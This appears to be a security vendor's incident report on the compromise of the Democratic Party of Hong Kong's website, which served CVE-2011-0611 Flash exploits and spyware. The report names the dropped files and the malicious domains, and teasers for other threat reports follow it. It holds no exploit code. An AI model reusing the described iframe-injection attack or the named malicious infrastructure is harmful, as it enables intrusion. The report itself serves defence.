Incidents

Democratic Party of Hong Kong Website Compromised and Serving Spyware

The Democratic Party of Hong Kong’s website was compromised and malware uploaded to the web server. Interestingly, the server was distributing malicious flash and spyware nearly identical to the compromised UK Amnesty International servers at the beginning of this month. The server is being cleaned up.

The english version of the website did not include injected iframe links pointing to the exploit.html page, which in turn delivers three different version-appropriate malicious variants of flash detected by Kaspersky as “Exploit.SWF.CVE-2011-0611”. The malicious flash was 0day at the beginning of this month, and will be effective on unpatched systems.

While it’s interesting that the security team researching the previous incident thought that the technique for delivering the payload to the hard drive is deserving a new term “drive-by caching”, it’s also incorrect to think that security products are given a higher bar to hurdle in preventing the attack because of the minor tweak – Kaspersky’s detection and prevention for the 0day flash files was released weeks before the Adobe patches. In other words, the attacks are being stopped just the same by Kaspersky products.

If one of the malicious flash is successful in downloading and executing the newsvine.jp2 file hosted on the server, it immediately drops a couple of files, pe.dll and srvlic.dll. These files are loaded and the delphi component decrypts its more sensitive information in-memory and phones collected information off of the system to loveusa.dyndns-blog.com. The drop server is not active at this point.

Because so many individuals run vulnerable versions of Adobe Flash and infrequently update their software, and because CVE-2011-0611 was just patched this month, the attackers had a pretty good chance of hitting their targets. Political groups continue to be an active target of cyberattacks this year.

UPDATE: we had a few final links to clean up from the standard suckerfish.js script on the server’s home page. These same malicious links leading to a 3rd party server at thesaj(dot)com hosting malicious flash, detected by Kaspersky as Exploit.SWF.CVE-2011-0611.u and Exploit.SWF.CVE-2011-0611.v, were injected and cleaned from “The Taiwan Brain Trust” web site a couple of weeks ago. The “Trust” is a group in Taiwan that “…provides policy analysis and recommendations to decision-makers in government, multinational corporations, private enterprises and civil society”, making it another compromised high value political target.

Democratic Party of Hong Kong Website Compromised and Serving Spyware

Your email address will not be published. Required fields are marked *

 

Reports

Lazarus targets defense industry with ThreatNeedle

In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

Sunburst backdoor – code overlaps with Kazuar

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Our observations shows that Kazuar was used together with Turla tools during multiple breaches in past years.

Lazarus covets COVID-19-related intelligence

As the COVID-19 crisis grinds on, some threat actors are trying to speed up vaccine development by any means available. We have found evidence that the Lazarus group is going after intelligence that could help these efforts by attacking entities related to COVID-19 research.

Sunburst: connecting the dots in the DNS requests

We matched private and public DNS data for the SUNBURST-malware root C2 domain with the CNAME records, to identify who was targeted for further exploitation. In total, we analyzed 1722 DNS records, leading to 1026 unique target name parts and 964 unique UIDs.

Subscribe to our weekly e-mails

The hottest research right in your inbox